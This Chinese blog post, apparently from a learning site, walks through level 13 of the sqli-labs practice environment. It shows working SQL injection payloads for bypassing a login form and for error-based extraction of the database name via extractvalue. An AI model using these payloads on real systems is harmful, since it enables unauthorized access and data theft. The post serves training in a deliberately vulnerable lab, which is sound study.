sqllab第十三关通关笔记

知识点:

  • 登录框处常见的语句(一般都是查询语句)
    • where username=''
    • where username=""
    • where usernam=('')
    • where username=("")
  • 错误注入知识回顾
  • 这里使用错误注入

通过admin admin登录发现没有任何回显信息;但是有成功登录的提示

通过bp抓包进行尝试绕过

尝试用单引号看看效果

构造payload:username=admin'

发现了报错信息;应该是一个where username=('输入内容')

好好好,这就好绕过了

构造payload:username=a')+or1=1#

欸,又报错了,发现了更多的信息;两个参数都是('输入内容');但是为啥会报错呢??

仔细一看发现or后面没加空格

重新构造payload:username=a')+or+1=1#

成功登录了;由于没有回显,这里不能用联合注入;

尝试进行错误注入

构造payload:username=a')+or+exp(710)#

成功打印了错误信息;说明这里是可以进行报错注入的

接下来利用报错注入获取数据库名

构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名;

到这里就结束了;报错注入获取表名和字段信息以及敏感内容信息在前几关就展示了;这里就不再进行演示了

10

相关推荐
愚昧之山绝望之谷开悟之坡3 分钟前
回购逆回购
笔记
鱼子星_6 分钟前
【C++】string(上):string的基本使用
c++·笔记·字符串
AOwhisky20 分钟前
Python 学习笔记(第四期)——字符串:格式化、操作与文本处理——核心知识点自测与详解
开发语言·笔记·python·学习·列表·元组·字典
chnyi6_ya26 分钟前
论文阅读笔记 | VIDEOPHY: Evaluating Physical Commonsense for Video Generation
论文阅读·笔记
AOwhisky1 小时前
Python 学习笔记(第六期)——函数:定义、参数传递与作用域
笔记·python·学习·云原生·运维开发·函数·参数传递
kdxiaojie2 小时前
Linux 驱动研究 —— V4L2 (2)
linux·运维·笔记·学习
阿米亚波2 小时前
【C++ STL】std::list
c++·windows·笔记·stl·list
大明者省3 小时前
‌Docker Desktop - Virtual Machine Platform not enabled
笔记
YUS云生4 小时前
Python学习笔记·第32天:FastAPI进阶——响应类型、中间件与依赖注入
笔记·python·学习
疯狂打码的少年4 小时前
【软件工程】需求工程:需求获取与需求分析
数据库·笔记·软件工程·需求分析